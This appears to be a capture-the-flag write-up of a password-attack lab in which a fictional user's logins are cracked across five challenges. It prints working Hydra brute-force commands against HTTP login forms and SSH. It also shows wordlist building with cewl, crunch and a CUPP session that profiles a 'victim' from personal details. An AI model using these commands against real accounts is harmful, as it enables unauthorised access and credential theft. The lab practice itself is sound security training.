Challenge 1:
Marco deployed a firewall at firewall.thm:5001 but kept default credentials.
Used this Command to get the pasword
hydra -l admin -P /usr/share/wordlists/rockyou.txt -f -V -t 4 10.48.180.224 -s 5001 http-post-form '/login:username=^USER^&password=^PASS^:F=Invalid credentials'
from page source got the parameters ->
And for an incorrect password it was showing "Invalid credentials"
Challenge 2:
Marco built an internal Employee Login panel on jobs.thm:5002 and used common company keywords as passwords.
We CEWL keywords from the site,
┌──(kali㉿kali)-[~/Try_Hack_Me/Challenges]
└─$ cewl --lowercase http://10.48.180.224:5002/ > passwords.txt
┌──(kali㉿kali)-[~/Try_Hack_Me/Challenges]
└─$ hydra -l marco -P passwords.txt -f -V -t 4 10.48.180.224 -s 5002 http-post-form '/login:username=^USER^&password=^PASS^:F=Invalid credentials'
Challenge 3 :
Navigate to social.thm:5003 and derive Marco's password from personal info.
With those info to make a wordlist "CUPP" is the best tool
┌──(kali㉿kali)-[~/Try_Hack_Me/Challenges]
└─$ cupp -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: Marco
> Surname: Bianchi
> Nickname: marky
> Birthdate (DDMMYYYY): 14021995
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]: N
> Do you want to add special chars at the end of words? Y/[N]: N
> Do you want to add some random numbers at the end of words? Y/[N]:N
> Leet mode? (i.e. leet = 1337) Y/[N]: N
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to marco.txt, counting 2816 words.
[+] Now load your pistolero with marco.txt and shoot! Good luck!
then used this command ->
hydra -l marco -P marco.txt -f -V -t 4 10.48.180.224 -s 5003 http-post-form '/login:username=^USER^&password=^PASS^:F=Invalid credentials'
Challenge 4:
On social.thm:5003, Marco recently uploaded a new profile picture. For privacy and storage consistency, the platform automatically renames uploaded files to the SHA256 hash of the original filename and saves them in the format (SHA256).png. Your task is to identify the original filename of Marco’s uploaded profile picture. Submit only the filename to proceed.
after log in with that credential we got this interface ->
When we opoened his profile pic noticed the file name is sha-256,
Challenge 5:
Marco has revealed his password pattern on social.thm:5003, using predictable rules based on keywords and formatting. Use this information to generate a targeted wordlist and brute-force the SSH service with username marco.
Now notice marco's post and also notice "oliver" hotel name->
But the oliver is not the company keyword what marco was indicating he was indicating "security" keyword under his post ->
so used this 2 commands ->
crunch 13 13 -t Security20%%! -o marco_wordlist.txt
hydra -l marco -P marco_wordlist.txt ssh://10.48.180.224
Top comments (0)